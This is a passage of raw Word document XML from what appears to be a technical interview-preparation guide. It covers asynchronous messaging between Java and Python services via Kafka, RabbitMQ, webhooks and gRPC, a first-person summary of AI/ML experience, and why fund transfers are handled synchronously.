        <w:t>two different technologies</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., one service in </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java/Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and another 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xml:space="preserve">), you can still achieve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using </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>standardized messaging system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rotocols</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that are </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>language-agnostic</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E3430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5DF775">
          <v:rect id="_x0000_i3877" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24900E6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ays to Achieve Asynchronous Communication Across Technologies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458681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Brokers / Queues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542123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a common messaging platform that both systems can connect to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1666143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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6523093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ache Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C24EDB4"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roduce message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBFD5BF"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Consume message using libraries like confluent-kafka-python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D780B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bbitMQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016D7F27"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ublish message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B3B3BD"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Listen via pika or aio-pika</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690338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SQ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Azure Service Bu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oogle Pub/Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA7A9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it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1CA6D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y use </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>standard protocols (AMQP, HTTP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2838C4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essages are in </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JSON, XML, Avro, Protobuf</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which all languages can parse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E1846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47AD">
          <v:rect id="_x0000_i3878" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA1E85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vent-Driven Architecture (EDA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305A576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vents are published to a broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D7B42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s subscribe based on topics or routing keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32271CA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29A193">
          <v:rect id="_x0000_i3879" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2183F0E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REST APIs with Polling (Less preferred)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBD1EB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e service POSTs data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B501BB0"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nother polls endpoint to retrieve data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B42F42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ideal but still asynchronous.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229E0F8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284331">
          <v:rect id="_x0000_i3880" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C69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Webhooks (Push-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7262B7B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 A (e.g., Java) sends an HTTP POST to a callback URL of Service B (e.g., Python Flask API).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502F2FB0"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90E2">
          <v:rect id="_x0000_i3881" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4559F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gRPC with Streaming (Advanced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2899293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gRPC supports multiple languages and has support for </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous bi-directional streaming</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CE8CE1"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0FF05">
          <v:rect id="_x0000_i3882" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFF572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Real-World Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC01F1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Case</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77762CC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Spring Boot service generates invoice data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA052D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service processes invoice for tax computation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2097C54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olution</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7977D1D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pushes JSON message to Kafka topic invoice-generated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BAF76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listens to invoice-generated, processes, and pushes to another topic tax-processed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B22ED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listens to tax-processed for next action.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688B68FA" w14:textId="71353EE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3883" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A637659" w14:textId="0966854B" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="000A2A1F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="959" w:name="_Toc197868173"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Do you have exposure in A</w:t>
      </w:r>
      <w:r w:rsidR="005B3196" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ML</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="959"/>
    </w:p>
    <w:p w14:paraId="5E5DE8F2" w14:textId="2F16F3F7" w:rsidR="00795EA8" w:rsidRPr="00617E2C" w:rsidRDefault="00795EA8" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:num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 have exposure to </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>AI and Machine Learning</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> concepts and implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BE81E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quick overview of the areas I’m familiar with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8B3E28"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FD9785">
          <v:rect id="_x0000_i3884" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDC754C"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re Areas in AI/ML:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8CCC9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upervised &amp; Unsupervised Learning</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>(Regression, Classification, Clustering)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06925B03"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Training &amp; Evaluation</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>(Train/Test Split, Cross-Validation, Accuracy, F1 Score)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BA2994"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eature Engineering</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>(Encoding, Normalization, Feature Selection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD9E20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Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>(Using Flask/FastAPI, Dockerize ML models, serve via REST API)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C17A36"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AAA241">
          <v:rect id="_x0000_i3885" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="497A6F10"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Tech Stack &amp; Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7903A5F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anguages</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0380F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ibraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: scikit-learn, pandas, NumPy, TensorFlow, Keras, PyTorch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D77B4C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serving</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Flask, FastAPI, Docker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045F652E"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ebooks</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Jupyter for experimentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB9473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ersioning</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Git, MLflow (for model tracking)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EECB7A"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F88C2">
          <v:rect id="_x0000_i3886" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3400B268"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Use Cases Worked On:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C90445"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xt Classification</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (NLP) using TF-IDF + Logistic Regression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB57F4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Classification</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using CNNs with TensorFlow/Keras</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E12AE1"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dictive Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for sales forecasting (Linear Regression, XGBoost)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5936A9E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omaly Detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using Isolation Forest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16851000" w14:textId="000A8A9C"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3887" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11BF5B47" w14:textId="2E5969F8" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="005F0528">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="960" w:name="_Toc197868174"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Examples of Fund Transfer are Synchronous or Asynchronous</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="960"/>
    </w:p>
    <w:p w14:paraId="210925A4" w14:textId="5D210A87" w:rsidR="00704C53" w:rsidRPr="00617E2C" w:rsidRDefault="00704C5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und transfer</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations are typically handled using </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the core transaction process. Here's why:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F5BEDF"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CBCD2">
          <v:rect id="_x0000_i3888" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA856F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hronous Example (Most Common in Fund Transfer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711E09F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 Action</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Initiates transfer from Bank A to Bank B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2872263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What Happens</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E302C9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I call is made.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592BBAA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stem verifies account, balance, and destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA4870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unds are debited immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BDD537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sponse is returned to the user: </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Transfer successful"</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i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"Failed"</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D7C4FC"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Reason</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It i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to confirm success or failure of the transaction </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — hence, it must be </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>synchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ACDFB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B4967D">
          <v:rect id="_x0000_i3889" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="370E9BF0"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Scenarios in Fund Transfer (Supporting Tasks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46810BB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ile the actual transfer is synchronous, supporting tasks may be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like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAB814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ification sending (email/SMS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518AC50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dger updates for analytics/reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B46CC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dit logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBE486A"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aud detection triggers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DECEBD7"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offloaded to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
